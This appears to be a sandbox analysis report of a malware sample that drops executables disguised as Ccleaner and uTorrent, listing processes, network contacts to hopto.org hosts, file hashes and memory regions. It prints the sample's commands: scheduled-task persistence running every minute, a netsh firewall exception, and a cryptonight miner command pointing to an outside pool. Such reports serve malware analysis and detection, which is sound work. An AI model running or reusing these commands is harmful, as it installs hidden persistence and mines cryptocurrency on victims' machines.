PID 1348 wrote to memory of 1148 N/A C:\Users\Admin\AppData\Local\Temp\Ccleaner.exe C:\Windows\SysWOW64\schtasks.exe

Processes

C:\Users\Admin\AppData\Local\Temp\0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe

"C:\Users\Admin\AppData\Local\Temp\0ed1010a80a3e115d7800f2618e8b7dc_JaffaCakes118.exe"

C:\Users\Admin\AppData\Local\Temp\Ccleaner.exe

"C:\Users\Admin\AppData\Local\Temp\Ccleaner.exe"

C:\Users\Admin\AppData\Local\Temp\cleaner.exe

"C:\Users\Admin\AppData\Local\Temp\cleaner.exe"

C:\Users\Admin\AppData\Local\Temp\Torrent.exe

"C:\Users\Admin\AppData\Local\Temp\Torrent.exe"

C:\Users\Admin\AppData\Local\Temp\μTorrent.exe

"C:\Users\Admin\AppData\Local\Temp\μTorrent.exe"

C:\Users\Admin\AppData\Local\Temp\Project1.exe

"C:\Users\Admin\AppData\Local\Temp\Project1.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /tn ApplicationFrameHost /tr "C:\Users\Admin\AppData\Roaming\browserbroker\djoin.exe" /sc minute /mo 1 /F

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /tn SettingSyncHost /tr "C:\Users\Admin\secinit\sdchange.exe" /sc minute /mo 1 /F

C:\Users\Admin\AppData\Local\Temp\NetFramework.exe

"C:\Users\Admin\AppData\Local\Temp\NetFramework.exe"

C:\Windows\explorer.exe

C:\Windows\explorer.exe -a cryptonight --url=redlan.hopto.org:3333 -p #PWD -R --variant=-1 -u GuyFlawkesMinerAdmin -k -t 4 --max-cpu-usage=50

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 776 -ip 776

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 776 -s 1064

C:\Windows\SysWOW64\Taskmgr.exe

"C:\Windows\System32\Taskmgr.exe"

C:\Windows\system32\wbem\WmiApSrv.exe

C:\Windows\system32\wbem\WmiApSrv.exe

C:\Users\Admin\secinit\sdchange.exe

C:\Users\Admin\secinit\sdchange.exe

C:\Users\Admin\AppData\Roaming\browserbroker\djoin.exe

C:\Users\Admin\AppData\Roaming\browserbroker\djoin.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /tn SettingSyncHost /tr "C:\Users\Admin\secinit\sdchange.exe" /sc minute /mo 1 /F

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /tn ApplicationFrameHost /tr "C:\Users\Admin\AppData\Roaming\browserbroker\djoin.exe" /sc minute /mo 1 /F

C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /tn backgroundTaskHost /tr "C:\Users\Admin\AppData\Local\Temp\RdpSaUacHelper\data.exe" /sc minute /mo 1 /F

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe" "RegAsm.exe" ENABLE

C:\Users\Admin\AppData\Local\Temp\RdpSaUacHelper\data.exe

C:\Users\Admin\AppData\Local\Temp\RdpSaUacHelper\data.exe

C:\Users\Admin\secinit\sdchange.exe

C:\Users\Admin\secinit\sdchange.exe

C:\Users\Admin\AppData\Roaming\browserbroker\djoin.exe

C:\Users\Admin\AppData\Roaming\browserbroker\djoin.exe

C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe

"C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /tn SettingSyncHost /tr "C:\Users\Admin\secinit\sdchange.exe" /sc minute /mo 1 /F

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

C:\Windows\SysWOW64\schtasks.exe

"C:\Windows\SysWOW64\schtasks.exe" /create /tn ApplicationFrameHost /tr "C:\Users\Admin\AppData\Roaming\browserbroker\djoin.exe" /sc minute /mo 1 /F

Network

Country Destination Domain Proto
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 73.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 77.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 redlan.hopto.org udp
US 184.105.237.195:3333 redlan.hopto.org tcp
US 8.8.8.8:53 195.237.105.184.in-addr.arpa udp
US 8.8.8.8:53 nandos.hopto.org udp
US 184.105.237.195:9003 nandos.hopto.org tcp
NL 23.62.61.106:443 www.bing.com tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.3.235:443 pastebin.com tcp
US 8.8.8.8:53 106.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 235.3.20.104.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 184.105.237.195:9003 nandos.hopto.org tcp
US 8.8.8.8:53 157.123.68.40.in-addr.arpa udp
US 8.8.8.8:53 56.126.166.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 184.105.237.195:3333 nandos.hopto.org tcp
US 184.105.237.195:9003 nandos.hopto.org tcp
US 184.105.237.195:3333 nandos.hopto.org tcp
US 8.8.8.8:53 42.56.20.217.in-addr.arpa udp
US 184.105.237.195:9003 nandos.hopto.org tcp
US 184.105.237.195:5553 nandos.hopto.org tcp
US 184.105.237.195:9003 nandos.hopto.org tcp
US 8.8.8.8:53 51.15.97.104.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 184.105.237.195:3333 nandos.hopto.org tcp
US 184.105.237.195:5553 nandos.hopto.org tcp
US 184.105.237.195:9003 nandos.hopto.org tcp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp
US 184.105.237.195:9003 nandos.hopto.org tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 184.105.237.195:3333 nandos.hopto.org tcp
US 184.105.237.195:5553 nandos.hopto.org tcp
US 184.105.237.195:9003 nandos.hopto.org tcp
US 184.105.237.195:9003 nandos.hopto.org tcp
US 184.105.237.195:5553 nandos.hopto.org tcp
US 184.105.237.195:3333 nandos.hopto.org tcp

Files

C:\Users\Admin\AppData\Local\Temp\Ccleaner.exe

MD5 d18ce77a75017e627de41febd9e289ee
SHA1 012a66d318e8294492accc0beca42c9999b68146
SHA256 7d6e025a8d510b10988375f020c60efec7d6ee77367ed8879e8a3b1172a5efd4
SHA512 c5f24a7f7c9e8ed552aa6402539171551851afd86b85b28e4018c2c8cd38c4ed22cb726eec5f750d90a25343e61e1cc97c62b1a486cbac6e04b777886411c86f

C:\Users\Admin\AppData\Local\Temp\cleaner.exe

MD5 b4bae96dc11834b254ec53b2cdba13aa
SHA1 7b67438093eb1860237bf88aefebf56bb9333aba
SHA256 bcd5d4c36ee50d99d6ae1aa91c0c12569f711d37e7b59a3483f413c7c2b68142
SHA512 ea2b93b7f9046e931812ab8efd364502d936ad28fa174f1c63d79fa46bedc5bbbf3476c0b551e40ae75bf82cbb3c5a107e41b49aeb6cd0b5fc294a5813519eda

C:\Users\Admin\AppData\Local\Temp\Torrent.exe

MD5 cedb1319e9cbd45f4cc69e58699009d3
SHA1 ef66c3f343744a6afa9b9955d65e6ccaba41c27e
SHA256 5f61384bf58773755f2ae7500b1e24b1394df6b69c80d240ad0731842c908808
SHA512 bb204c60f138e4a341a6eafed2b39409105805e391bea572e5df0d8f0a24e5af8e2d2da9fedb26460adef321079efbe8443fa08bb0e0b3702e6478452bb26bd8

memory/4928-33-0x0000000000860000-0x0000000000F46000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\μTorrent.exe

MD5 7e962cb55be5963163d4f6a21100950c
SHA1 f58ad41f8c86b9cffc7d66f4991162f731926d1d
SHA256 1e6af101af20d01594ae2d42d066198b7e226546e6cd9f37594783618e758968
SHA512 757996c16752816850607d4ef1cb12e002133c73a2c431ef735aa56f01bf33a6ea4e2725556e2a53a4603552348477fa72c286afdf1fd605ea5f8671b2486b3a

memory/3316-45-0x0000000000970000-0x0000000001056000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\Project1.exe

MD5 1166591fc5f77c463d176bcca574efff
SHA1 35d710b8983945aaf8c39d289fd6c73ed1f00b65
SHA256 a51c6e6c19be022dcbf235a9bebeab1b73292e2ee40b48653e80b96f10aa9bad
SHA512 751f5cf2cc5316ddbbba2805ac9c3fee24d80a85c92587c85ac80a2033aaeef96f58bcb5053584bcea7ad8fcb538183da9d29360f44666e1bfd3bdf0f08caa97

memory/776-57-0x00000000028F0000-0x0000000002A30000-memory.dmp

memory/776-56-0x0000000002A60000-0x0000000002A61000-memory.dmp

memory/776-58-0x00000000028F0000-0x0000000002A30000-memory.dmp

memory/776-75-0x00000000028F0000-0x0000000002A30000-memory.dmp

memory/776-76-0x00000000028F0000-0x0000000002A30000-memory.dmp

memory/776-74-0x0000000002CF0000-0x0000000002CF1000-memory.dmp

memory/776-73-0x00000000028F0000-0x0000000002A30000-memory.dmp

memory/776-72-0x00000000028F0000-0x0000000002A30000-memory.dmp

memory/776-71-0x0000000002CE0000-0x0000000002CE1000-memory.dmp

memory/776-70-0x00000000028F0000-0x0000000002A30000-memory.dmp

memory/776-69-0x00000000028F0000-0x0000000002A30000-memory.dmp

memory/776-68-0x0000000002CD0000-0x0000000002CD1000-memory.dmp

memory/776-67-0x00000000028F0000-0x0000000002A30000-memory.dmp

memory/776-66-0x00000000028F0000-0x0000000002A30000-memory.dmp

memory/776-65-0x0000000002CC0000-0x0000000002CC1000-memory.dmp

memory/776-64-0x00000000028F0000-0x0000000002A30000-memory.dmp

memory/776-63-0x00000000028F0000-0x0000000002A30000-memory.dmp

memory/776-93-0x00000000028F0000-0x0000000002A30000-memory.dmp

memory/776-94-0x00000000028F0000-0x0000000002A30000-memory.dmp

memory/776-114-0x00000000028F0000-0x0000000002A30000-memory.dmp

memory/776-120-0x00000000028F0000-0x0000000002A30000-memory.dmp

memory/776-119-0x0000000003810000-0x0000000003811000-memory.dmp

memory/776-118-0x00000000028F0000-0x0000000002A30000-memory.dmp

memory/1960-129-0x0000000004F70000-0x000000000501E000-memory.dmp

memory/1960-130-0x0000000002880000-0x00000000028A8000-memory.dmp

memory/1960-133-0x0000000005670000-0x0000000005702000-memory.dmp

memory/1960-134-0x00000000059C0000-0x0000000005A26000-memory.dmp

memory/1960-132-0x0000000005A40000-0x0000000005FE4000-memory.dmp

memory/1960-131-0x00000000052F0000-0x000000000538C000-memory.dmp

memory/1960-128-0x0000000002850000-0x0000000002860000-memory.dmp

memory/776-117-0x00000000028F0000-0x0000000002A30000-memory.dmp

memory/776-116-0x0000000003800000-0x0000000003801000-memory.dmp

memory/776-115-0x00000000028F0000-0x0000000002A30000-memory.dmp

memory/776-113-0x00000000037F0000-0x00000000037F1000-memory.dmp

memory/776-112-0x00000000028F0000-0x0000000002A30000-memory.dmp

memory/1960-139-0x00000000065C0000-0x00000000065D8000-memory.dmp

memory/776-111-0x00000000028F0000-0x0000000002A30000-memory.dmp

memory/776-110-0x00000000037E0000-0x00000000037E1000-memory.dmp

memory/776-109-0x00000000028F0000-0x0000000002A30000-memory.dmp

memory/776-108-0x00000000028F0000-0x0000000002A30000-memory.dmp

memory/776-107-0x00000000037D0000-0x00000000037D1000-memory.dmp

memory/776-106-0x00000000028F0000-0x0000000002A30000-memory.dmp

memory/776-105-0x00000000028F0000-0x0000000002A30000-memory.dmp

memory/776-104-0x00000000037C0000-0x00000000037C1000-memory.dmp

memory/776-103-0x00000000028F0000-0x0000000002A30000-memory.dmp

memory/776-102-0x00000000028F0000-0x0000000002A30000-memory.dmp

memory/776-101-0x00000000037B0000-0x00000000037B1000-memory.dmp

memory/776-100-0x00000000028F0000-0x0000000002A30000-memory.dmp

memory/776-99-0x00000000028F0000-0x0000000002A30000-memory.dmp

memory/776-98-0x00000000037A0000-0x00000000037A1000-memory.dmp

memory/776-97-0x00000000028F0000-0x0000000002A30000-memory.dmp

memory/776-96-0x00000000028F0000-0x0000000002A30000-memory.dmp

memory/776-95-0x0000000002D40000-0x0000000002D41000-memory.dmp

memory/776-92-0x0000000002D30000-0x0000000002D31000-memory.dmp

memory/776-91-0x00000000028F0000-0x0000000002A30000-memory.dmp

memory/776-89-0x0000000002D20000-0x0000000002D21000-memory.dmp

memory/776-87-0x00000000028F0000-0x0000000002A30000-memory.dmp

memory/776-88-0x00000000028F0000-0x0000000002A30000-memory.dmp

memory/776-86-0x0000000002D10000-0x0000000002D11000-memory.dmp

memory/776-85-0x00000000028F0000-0x0000000002A30000-memory.dmp

memory/776-84-0x00000000028F0000-0x0000000002A30000-memory.dmp

memory/776-83-0x0000000002D00000-0x0000000002D01000-memory.dmp

memory/776-90-0x00000000028F0000-0x0000000002A30000-memory.dmp

memory/1960-78-0x0000000000400000-0x0000000000456000-memory.dmp

memory/776-62-0x0000000002CB0000-0x0000000002CB1000-memory.dmp

memory/776-61-0x00000000028F0000-0x0000000002A30000-memory.dmp

memory/776-60-0x00000000028F0000-0x0000000002A30000-memory.dmp

memory/776-59-0x0000000002CA0000-0x0000000002CA1000-memory.dmp

memory/3316-154-0x0000000003120000-0x0000000003128000-memory.dmp

memory/1960-169-0x0000000006840000-0x0000000006856000-memory.dmp

memory/1960-170-0x0000000006990000-0x000000000699A000-memory.dmp

memory/3132-173-0x000000001C190000-0x000000001C832000-memory.dmp

memory/1960-214-0x0000000004F30000-0x0000000004F3C000-memory.dmp

C:\Users\Admin\secinit\sdchange.exe

MD5 10e1cc65ee03662df9465daf93d2a6d4
SHA1 ddda80f58ef85711ada3e852f0ff678b11a19fba
SHA256 ff3159ab119e89371e98f968c9411d2867beffe2d19c81521048f24e08f03b73
SHA512 60514d3a9eba1a03153c831955c3998095c57e74126242eb394ebea45c47778d902f7acd584ee5bf38d345322a88db70726d3d6eae5d440d5850aa50a77d5fed

C:\Users\Admin\AppData\Roaming\browserbroker\djoin.exe

MD5 38d52d78beaf141a5c571ebac5abcecf
SHA1 459e3f5380f0bff65d8b3e968474286a4c22233e
SHA256 2d8c1346339bdc15a622224fda3e92f46e929c9a168d6369370fa1b52224a37f
SHA512 bbdcd23fdcda6c1d47f6fe6221c0bfe710686a3e9099c33e45298447805b00f3bd4022add5f90bddc8df53b44a6d67b5891b17b1b78974045675bc3b16ecf30b

C:\Users\Admin\AppData\Local\Microsoft\CLR_v2.0_32\UsageLogs\RegAsm.exe.log

MD5 9f893d94b017a0684012d50319c9ffbe
SHA1 140cc2cb6b2520ba4f9a1f666a5f679853472793
SHA256 8a7cb420c82edf1bb2c7bdfef52091e5169fabaecc370e120985e91406fcbbec
SHA512 4b7df94d3622b82d852b0f532d7fd810ca2113d7b737ec417023d5b2142e9e79414a06d22647d73f8bc114f8e871a3a741a479b0aba48892f9078975ec78acba

C:\Users\Admin\AppData\Local\Temp\RdpSaUacHelper\data.exe

MD5 17595fb50fdac8631d762e38e2474697
SHA1 3a8fd5d2335309feff92857f59b47257a1df927d
SHA256 7fee27bac2bf2d87bc277d4d7d435f9ab0b65b75f1c1848af17be7b2b963f880
SHA512 995ff44db169565f777514bfb88c585e2a734bf2351797f59bb48c5f773f62bcbaa1f45f6d2e4a139210aefa082577293fe5b10d94596f98b52c4eaef25534fa

C:\Users\Admin\AppData\Local\Temp\cleaner.exe

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\RegSvcs.exe.log

MD5 6832f1ed5b3043154d3b685cce8c8b87
SHA1 4c42ec0798aaad1fe7d7650e9e7c00bf978658b3
SHA256 fa9d245a676b1e7c3ebd887c5e0d1655ddcb7faf632197796dbb61eaf5131061
SHA512 cb847efcab6c67bbe0677984a6421befb559a32a33ea814d7acef539365f03cd14715e21e5d02b8d770abd73e74f8df108225aa1eb7dc8caca1723de15135584